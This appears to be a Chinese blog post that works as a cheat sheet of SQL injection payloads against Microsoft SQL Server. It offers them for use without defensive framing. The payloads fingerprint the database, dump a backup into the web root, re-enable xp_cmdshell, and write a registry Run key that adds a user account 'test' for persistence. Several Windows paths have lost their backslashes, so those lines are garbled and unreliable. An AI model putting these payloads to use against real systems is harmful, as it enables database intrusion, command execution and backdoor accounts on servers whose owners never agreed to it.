sql注入语句有哪些 常用的sql注入语句

主机教程 建站分享 2年前 (2022-10-12) 192次浏览

文章摘要:sql注入语句有哪些 常用的sql注入语句

sql注入语句有: 1、返回的是连接的数据库名: and db_name()>0 2、获取连接用户名: and […]

sql注入语句有:

1、返回的是连接的数据库名:

and db_name()>0

2、获取连接用户名:

and user>0

3、将数据库备份到Web目录下面:

;backup database 数据库名 to disk='c:inetpubwwwroot1.db';--

4、显示SQL系统版本:

and 1=(select @@VERSION) 或and 1=convert(int,@@version)--

5、判断xp_cmdshell扩展存储过程是否存在:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')

6、恢复xp_cmdshell扩展存储的命令:

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:inetputwebxplog70.dll';--

7、向启动组中写入命令行和执行程序:

;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion

Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'

8、查看当前的数据库名称:

and 0 <> db_name(n) n改成0,1,2,3……就可以跨库了 或and 1=convert(int,db_name())--


声明:
若非注明,本站文章源于互联网收集整理和网友分享发布,如有侵权,请联系站长处理。
文章名称:sql注入语句有哪些 常用的sql注入语句
文章链接:http://www.7966.org/post/17007.html
转载请注明出处

喜欢 (0)